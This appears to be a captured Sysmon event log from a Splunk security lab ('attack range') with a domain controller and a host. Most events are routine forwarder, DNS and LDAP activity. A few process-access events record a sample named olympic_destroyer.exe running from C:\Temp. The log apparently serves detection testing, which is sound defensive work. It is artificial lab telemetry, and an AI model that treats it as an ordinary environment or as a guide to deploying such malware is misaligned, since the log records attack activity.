Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2915076061B2D0A357697B32DA88C928,SHA256=7DE410DA9098D7591CA8A9C182998DAFD5F813B958341EDFB692851D2AC282D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:04.422{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E6AC70425AFD7114141AC50FDC06740,SHA256=5FC68D0FD7A1579621620715BD26B2775611458C8FB6636325C7F20667CA6DF5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220937Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:01.578{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51615-false10.0.1.12-8000- 354300x8000000000000000297005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.802{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61034- 23542300x8000000000000000297010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:05.438{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16CBC9BFDA29CC667098C0BFA0DA49AE,SHA256=0BAF687CE6394E0DEE45DEFB5A49862EC56CDE7C0C5D114DC0823868E277C385,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:03.440{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49409-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:03.440{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49409-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:02.937{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61611- 23542300x8000000000000000297011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:06.469{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3ED33E4760BC2F4E95FB2B4D8321B99,SHA256=D6B9A6A0287E1C4C03098A76EED85D5FC8DD5D04EB3F1BEC315E0BFF795B9E96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220939Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:06.047{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFC0EECFFC57B93F8E3CA043333B8C33,SHA256=72CA853A178A6F44D7D2BB417FB694D9DE849A885F2E7432148D6981E56BC2FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:07.469{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D8C2C11060580684959BB667F4EDF01,SHA256=18ADB0B60D0E099CB4151C3D33F06E49179AF42C40CC2BF97222A9E2C8C5A54A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220940Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:07.140{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD5CEBE6D682E8B49423F08017A50672,SHA256=2508A9A63D0B8B84B1F25870AD033FB1B81ED036AB0E3A840CA8E44BC093169B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:05.574{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49410-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:08.500{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=123266F241AA5D5517D49D1C05D06AD8,SHA256=666A6D57A78D1C673EEE3FF24C9653AD63411A0105BE4E9AF5367AF4FA0409BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220941Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:08.156{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6170F7905554D7CEF812B33C913314BD,SHA256=FCBADB1C5DD9BFA24C652CAEBEF6C3F1604B5C10F7F2C94665C8D05BDA5F1A1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:09.501{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=485537D6E8B9684F1DA29120E7230B1D,SHA256=7165C1FFF05882AA3AD2DE1905C21102F5498179B904CBC474C37EB66C1DFDDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220942Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:09.375{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11FF87644C3FFCF73F2B2615103DBF0F,SHA256=B5F93042288E1423CB37ED746F2EB62184CBE121B31626BF754F0C4F48CF6406,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:10.501{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92C3D0FCE1F328E47BC7EB79216884DB,SHA256=65F464C312033F8500EB169E786FF0D1ADE2F8F5DB44A90C61A19DEBA9A04C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220944Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:10.375{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B510CF57C6CF8CB550639E1E0ED868A1,SHA256=B88F2D61BC784A7CE04B628DB031B75C5814AFBC7A1E0D183500B6A702432DD4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220943Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:07.497{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51616-false10.0.1.12-8000- 23542300x8000000000000000297018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:11.521{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A2AB8CEB48B06CEA92CDF0E4A103EC2,SHA256=D448487A673A53C86C184CF4FCF559DEDB065F5112FB028C696988F4B8FE5800,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220945Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:11.390{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50BD49198351DA89824F0EA63F077C99,SHA256=06DF9D9F1632A7AAF2D3173FC355E6598444D9F3D04253E482AED9F23C270F32,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:11.085{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000297022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:10.643{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49412-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:12.538{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65C36070642D11A3B92FA7F4A28FDF75,SHA256=07FF2F56EC12B3C92A39C72F6BC7DC08B41E38A888C32A9945F793A6CD730BF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220946Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:12.437{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D41FC24EE9C1632EAE37CA9C5AAC392,SHA256=E7DE66289786A084057EAF2976968AD943B98DE6E69ADDC3EBE9E3AD070A1029,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:12.121{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=52540D2EC2AE883179124CDF69698864,SHA256=31F2ECEB0A3A4C765D515EC970DB72D723D1FE4AC7026FD55AEB49D1D0188B20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:12.119{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=F36DAE87287D6DFA19A02E4DE6C08BF0,SHA256=4B25E8B7BF9EF3B4B81B59ACF75D60F00BE109F77326D48B3C9F05600C86C6D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:13.601{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:13.601{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:13.601{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:13.601{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:13.601{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:13.601{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:13.539{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8882409547441A2D44312B82ABA0E074,SHA256=A08EE9188FEBFA59B37BEF9A0B5BD9F1863137A4E338F1780EFCDC859E3E4373,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220947Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:13.453{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE1890B93EC86788400F94CF3BF1691F,SHA256=AC95AECF5A63F050B610749073C6B4E7CEEE2E4895DA88B757206A967019FB86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220948Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:14.468{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=725D37D2D89B8FD9C96A010B84B5AA7E,SHA256=888C638975D9A2CB2ACDF6D6881AA025A0B61CC374C083C7530B30B22BFC62DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:14.554{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8239C467840FB30457FA830C9823BD8C,SHA256=AEC1BAC8A922D00DC9755AF91207368202F4472D84153C8ED947E7C6A1E6AB4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220950Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:15.499{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B47B94E55F7639AA2DCCEBFA25078D74,SHA256=BDB387A66E2A21CF713BA45AB6B244B8ED3E0A3DC26931EB6A477A532BC5FE8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:15.569{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76F6A693C62E452FABFBE499F37F335C,SHA256=2D28D88B87D97DDC472680FEFDC2970C8A20906120AC90DDD2ADB2F42ECC9B70,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220949Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:12.560{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51617-false10.0.1.12-8000- 23542300x8000000000000000220951Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:16.531{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDB9FDB3FA6E94165989DF0CD489EB19,SHA256=7C3D5DF300D5442BDC980673414EBF232155130A884B1F50CB67EC0AE6A7914F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:16.584{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08F30B5789114E63EA3E3CA0D94F440D,SHA256=3C69CE412CC6282AA6AD31F3DBB0DD5B090AC9FE0DD269CAD63044227A416A1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220952Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:17.546{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59D8651058FB375A343CF13ADB543364,SHA256=44ABC35A06A09A0F93E73765A040D9EAD5C2C513B1FD090C009501F28ACB65F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:17.599{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45EC9A169EB10CD5C00C1BE8DD55C289,SHA256=7F3F932694A17EE63EE0F7F5F3AB64647A435CF704951FB6E1392596386F0521,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220953Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:18.578{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=519E7582F5C73CE8FED24365F965506E,SHA256=20E8C8810D7E1FC8437B1CADD097E27670BADEE36A562FC9652516F78C6B9F52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:18.636{C8EA50B7-F144-6215-7700-000000003802}3964NT 